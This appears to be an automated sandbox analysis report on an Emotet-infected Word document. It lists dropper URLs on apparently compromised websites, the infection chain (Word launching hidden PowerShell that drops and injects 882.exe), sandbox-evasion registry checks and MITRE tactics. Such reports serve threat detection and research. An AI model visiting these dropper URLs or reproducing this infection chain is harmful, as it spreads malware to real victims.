25eace8fcf797762361e56a88c938c30f99acb13c928b8f618f0d0a6f33fd60b

General
Target:     25eace8fcf797762361e56a88c938c30f99acb13c928b8f618f0d0a6f33fd60b
Filesize:   N/A
Completed:  25-12-2019 01:03
Score:      10/10
SHA256:     25eace8fcf797762361e56a88c938c30f99acb13c928b8f618f0d0a6f33fd60b

Malware Config

Extracted
Language:  ps1
Source:    URLs

exe.dropper  http://diwafashions.com/wp-admin/mqau6/
exe.dropper  http://designers.hotcom-web.com/ubkskw29clek/qnpm1p/
exe.dropper  http://dixartcontractors.com/cgi-bin/nnuv/
exe.dropper  http://diaspotv.info/wordpress/G/
exe.dropper  http://easyvisaoverseas.com/cgi-bin/v/

Extracted
Family:  emotet
C2:
rsa_pubkey.plain
Signatures 13

Filter: none

Discovery
  • Executes dropped EXE
    882.exe, 882.exe

    Reported IOCs

    pid   process
    3848  882.exe
    4368  882.exe
  • Suspicious behavior: EmotetMutantsSpam
    882.exe

    Reported IOCs

    pid   process
    4368  882.exe
  • Checks processor information in registry

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query Registry, System Information Discovery

    Reported IOCs

    description        ioc
    Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
  • Enumerates system info in registry

    TTPs

    Query Registry, System Information Discovery

    Reported IOCs

    description        ioc
    Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
  • Suspicious behavior: AddClipboardFormatListener
    WINWORD.EXE

    Reported IOCs

    pid   process
    4968  WINWORD.EXE
  • Suspicious use of FindShellTrayWindow
    WINWORD.EXE

    Reported IOCs

    pid   process
    4968  WINWORD.EXE
  • Suspicious use of WriteProcessMemory
    Powershell.exe, 882.exe

    Reported IOCs

    description                       pid   process         target process
    PID 3344 wrote to memory of 3848  3344  Powershell.exe  882.exe
    PID 3848 wrote to memory of 4368  3848  882.exe         882.exe
  • Suspicious behavior: EnumeratesProcesses
    Powershell.exe

    Reported IOCs

    pid   process
    3344  Powershell.exe
  • Emotet

    Description

    Emotet is a trojan that is primarily spread through spam emails.

  • Drops file in System32 directory
    882.exe

    Reported IOCs

    description   ioc                                                        process
    File renamed  C:\Users\Admin\882.exe => C:\Windows\SysWOW64\memoraw.exe  882.exe
  • Suspicious use of SetWindowsHookEx
    WINWORD.EXE, 882.exe, 882.exe

    Reported IOCs

    pid   process
    4968  WINWORD.EXE
    3848  882.exe
    4368  882.exe
  • Process spawned unexpected child process
    Powershell.exe

    Reported IOCs

    description                                                                         pid   pid_target  process         target process
    Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  3344  2088        Powershell.exe
  • Suspicious use of AdjustPrivilegeToken
    Powershell.exe

    Reported IOCs

    description              pid   process
    Token: SeDebugPrivilege  3344  Powershell.exe
Processes 4
  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\25eace8fcf797762361e56a88c938c30f99acb13c928b8f618f0d0a6f33fd60b.doc" /o ""
    Suspicious behavior: AddClipboardFormatListener
    Suspicious use of FindShellTrayWindow
    Suspicious use of SetWindowsHookEx
    PID:4968
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en 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
    Suspicious use of WriteProcessMemory
    Suspicious behavior: EnumeratesProcesses
    Process spawned unexpected child process
    Suspicious use of AdjustPrivilegeToken
    PID:3344
    • C:\Users\Admin\882.exe
      "C:\Users\Admin\882.exe"
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      Suspicious use of SetWindowsHookEx
      PID:3848
      • C:\Users\Admin\882.exe
        --2f98b90
        Executes dropped EXE
        Suspicious behavior: EmotetMutantsSpam
        Drops file in System32 directory
        Suspicious use of SetWindowsHookEx
        PID:4368
Network
MITRE ATT&CK Matrix
Collection, Command and Control, Credential Access, Defense Evasion, Execution, Exfiltration, Impact, Initial Access, Lateral Movement, Persistence, Privilege Escalation
Downloads
  • C:\Users\Admin\882.exe
  • C:\Users\Admin\882.exe
  • C:\Users\Admin\882.exe
  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438
  • memory/3848-8-0x00000000023C0000-0x00000000023D7000-memory.dmp
  • memory/4368-11-0x00000000020F0000-0x0000000002107000-memory.dmp
  • memory/4368-12-0x0000000000400000-0x00000000004AA000-memory.dmp
  • memory/4968-2-0x00000177E660B000-0x00000177E6614000-memory.dmp